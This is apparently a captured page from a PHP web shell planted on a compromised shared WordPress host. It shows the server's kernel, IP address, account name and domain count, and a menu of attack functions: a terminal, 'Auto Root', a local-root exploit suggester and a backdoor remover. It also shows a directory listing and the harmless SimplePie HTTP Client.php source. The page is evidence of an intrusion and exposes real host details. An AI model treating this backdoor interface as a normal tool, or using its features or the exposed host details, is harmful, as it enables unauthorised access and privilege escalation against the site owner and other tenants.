Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.217.64
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
georgeto /
wp-includes /
SimplePie /
src /
HTTP /
Delete
Unzip
Name
Size
Permission
Date
Action
Client.php
607
B
-rw-r--r--
2025-12-03 17:22
ClientException.php
333
B
-rw-r--r--
2025-12-03 17:22
FileClient.php
2.21
KB
-rw-r--r--
2025-12-03 17:22
Parser.php
14.85
KB
-rw-r--r--
2025-12-03 17:22
Psr18Client.php
4.34
KB
-rw-r--r--
2025-12-03 17:22
Psr7Response.php
2.13
KB
-rw-r--r--
2025-12-03 17:22
RawTextResponse.php
2.02
KB
-rw-r--r--
2025-12-03 17:22
Response.php
6.78
KB
-rw-r--r--
2025-12-03 17:22
Save
Rename
<?php // SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue // SPDX-License-Identifier: BSD-3-Clause declare(strict_types=1); namespace SimplePie\HTTP; /** * HTTP Client interface * * @internal */ interface Client { public const METHOD_GET = 'GET'; /** * send a request and return the response * * @param Client::METHOD_* $method * @param array<string, string> $headers * * @throws ClientException if anything goes wrong requesting the data */ public function request(string $method, string $url, array $headers = []): Response; }